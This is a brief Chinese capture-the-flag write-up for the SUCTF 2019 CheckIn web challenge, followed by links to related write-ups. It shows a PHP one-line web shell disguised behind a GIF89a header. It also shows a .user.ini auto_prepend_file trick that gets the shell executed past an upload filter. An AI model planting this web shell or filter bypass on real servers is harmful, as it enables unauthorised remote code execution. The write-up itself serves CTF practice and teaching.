黑名单过滤后缀’ph',并且白名单image类型要有对应文件头
对<?过滤,改用GIF89a<script language='php'>@eval($_POST['cmd']);</script>,成功把getshell.gif上传上去了
尝试用.htaccess将上传的gif当作php解析,但是失败了
根据这篇文章.user.ini文件构成的PHP后门 - phith0n (wooyun.js.org)
上传.user.ini使用auto_prepend_file=<specific_file>将指定文件包含到当前目录下的php文件前
可以看到getshell.gif的文件头已经显示出来了,说明成功包含getshell.gif,后面跟着的一句话木马自然可以运行
连接蚁剑找到flag
![BUUCTF---web---[<span style='color:red;'>SUCTF</span> <span style='color:red;'>2019</span>]<span style='color:red;'>CheckIn</span>](https://img-blog.csdnimg.cn/direct/30d3b31d920e4182a16c3bbda6562c24.png)
![web:[<span style='color:red;'>SUCTF</span> <span style='color:red;'>2019</span>]<span style='color:red;'>CheckIn</span>(一句话木马,.user.ini)](https://img-blog.csdnimg.cn/direct/3c650b6641be489c83efcefa0f98c25d.png)
![练习 9 Web [<span style='color:red;'>SUCTF</span> <span style='color:red;'>2019</span>]<span style='color:red;'>CheckIn</span> (未拿到flag)](https://img-blog.csdnimg.cn/direct/9f5bfe78261f45cf826ba6814ecc52f5.png)
![[<span style='color:red;'>SCTF</span><span style='color:red;'>2019</span>]babyre](https://img-blog.csdnimg.cn/direct/8582d26183c942c4914f74ec4b910821.png)
![[<span style='color:red;'>SUCTF</span> <span style='color:red;'>2018</span>]MultiSQL MYSQL 预处理写](https://img-blog.csdnimg.cn/direct/faa88705bec049728e8381057531e9f1.png)
![[ZJCTF <span style='color:red;'>2019</span>]NiZhuanSiWei<span style='color:red;'>1</span>](https://img-blog.csdnimg.cn/direct/baca64cfc954499bbda2c8b70b33689a.png#pic_center)
